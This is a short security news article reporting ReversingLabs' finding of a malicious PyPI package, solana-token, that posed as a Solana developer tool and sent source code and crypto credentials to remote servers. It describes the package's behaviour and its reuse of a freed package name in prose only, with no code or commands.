The ReversingLabs research team has uncovered yet another software supply chain attack targeting the cryptocurrency ecosystem, this time involving a rogue Python package called solana-token. Posing as a legitimate utility for Solana developers, the package was discovered on the Python Package Index (PyPI) and had been downloaded more than 600 times before its takedown.
Solana, a popular blockchain platform renowned for high-speed, low-fee transactions, continues to attract interest from both developers and threat actors. The malicious solana-token package exploited this popularity by masquerading as a tool for developers working on Solana-based applications.
“While the PyPI landing page for the package did not include a description, the package name and functions suggest that developers looking to create their own blockchains were the likely targets,” the ReversingLabs team wrote.
The malicious package contained telltale signs of compromise, including:
- Hardcoded IP addresses used to exfiltrate stolen data
- Outbound communications to non-standard network ports
- Code that reads local files, a behavior often seen in infostealers
One particularly insidious method in the package “scanned the Python execution stack, then copied and exfiltrated source code contained in all the files in the execution chain to a remote server.”
The objective is to steal developer secrets and hardcoded crypto credentials often left unprotected within source code. Such sensitive information could grant attackers unauthorized access to cryptocurrency wallets and critical infrastructure.
This isn’t the first time this package name has surfaced. In fact, a previous package with the same name was published and removed in 2024. But due to the way the earlier removal occurred—by the package author, not PyPI security staff—the name became available again.
“That left the package name available for re-use… suggesting the same malicious actors that pulled down the earlier solana-token package may be behind the new malicious version,” the report noted.
